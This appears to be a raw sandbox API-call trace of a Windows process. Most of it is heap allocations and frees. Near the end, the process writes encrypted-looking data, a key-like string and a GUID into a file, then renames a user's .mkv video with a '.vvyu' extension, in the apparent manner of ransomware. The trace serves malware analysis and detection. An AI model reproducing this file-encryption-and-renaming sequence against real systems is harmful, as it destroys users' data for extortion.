RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.422] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6608 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.425] GetCurrentThreadId () returned 0x5d8 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8da8 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.426] GetCurrentThreadId () returned 0x5d8 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea2f0 | out: hHeap=0x2c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.438] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xd148, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xd148, lpOverlapped=0x0) returned 1 [0196.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.439] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd14d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.439] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0196.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0196.441] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.441] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.441] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.441] CloseHandle (hObject=0x584) returned 1 [0196.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0196.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.443] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\OPCtfBG3jGTa hU3.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\opctfbg3jgta hu3.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\OPCtfBG3jGTa hU3.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\opctfbg3jgta hu3.mkv.vvyu")) returned 1 [0196.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.445] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0196.447] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f31f790, ftCreationTime.dwHighDateTime=0x1d8a179, ftLastAccessTime.dwLowDateTime=0xa11baf30, ftLastAccessTime.dwHighDateTime=0x1d8a2eb, ftLastWriteTime.dwLowDateTime=0xa11baf30, ftLastWriteTime.dwHighDateTime=0x1d8a2eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wICCgSS9cO9EJxpugq", cAlternateFileName="WICCGS~1")) returned 1 [0196.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0196.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0196.448] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f31f790, ftCreationTime.dwHighDateTime=0x1d8a179, ftLastAccessTime.dwLowDateTime=0xa11baf30, ftLastAccessTime.dwHighDateTime=0x1d8a2eb, ftLastWriteTime.dwLowDateTime=0xa11baf30, ftLastWriteTime.dwHighDateTime=0x1d8a2eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wICCgSS9cO9EJxpugq", cAlternateFileName="WICCGS~1")) returned 0 [0196.448] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0196.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0196.449] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0196.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40370 | out: hHeap=0x2c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40688 | out: hHeap=0x2c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a404d0 | out: hHeap=0x2c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ecd8 | out: hHeap=0x2c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ec08 | out: hHeap=0x2c0000) returned 1 [0196.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af20a8 | out: hHeap=0x2c0000) returned 1 [0196.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0196.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eb38 | out: hHeap=0x2c0000) returned 1 [0196.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ef48 | out: hHeap=0x2c0000) returned 1 [0196.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0196.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee10 | out: hHeap=0x2c0000) returned 1 [0196.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0196.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.454] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0196.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.456] 